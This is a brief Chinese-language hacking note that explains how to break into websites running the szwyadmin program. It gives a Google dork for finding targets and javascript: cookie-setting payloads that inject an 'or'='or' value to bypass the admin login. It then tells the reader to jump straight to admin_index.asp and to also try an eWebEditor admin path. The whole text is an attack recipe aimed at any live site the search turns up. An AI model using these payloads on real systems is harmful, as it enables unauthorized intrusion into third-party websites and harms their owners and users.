szwyadmin程序漏洞拿shell【方法笔记】

我们在Google中搜索关键词 

关键字:inurl:szwyadmin/login.asp

任意打开一个搜索结果，打开登录界面后在地址栏中输入下面的代码： 

代码： 

 

javascript:alert(document.cookie="adminuser="+escape("'or'='or'")); 

javascript:alert(document.cookie="adminpass="+escape("'or'='or'")); 

javascript:alert(document.cookie="admindj="+escape("1")); 

　　

关闭此页面 

在次打开登录界面 

在地址栏中将login.asp改为admin_index.asp

就直接进入后台了 

另外还可以试试 

ewebeditor/admin_login.asp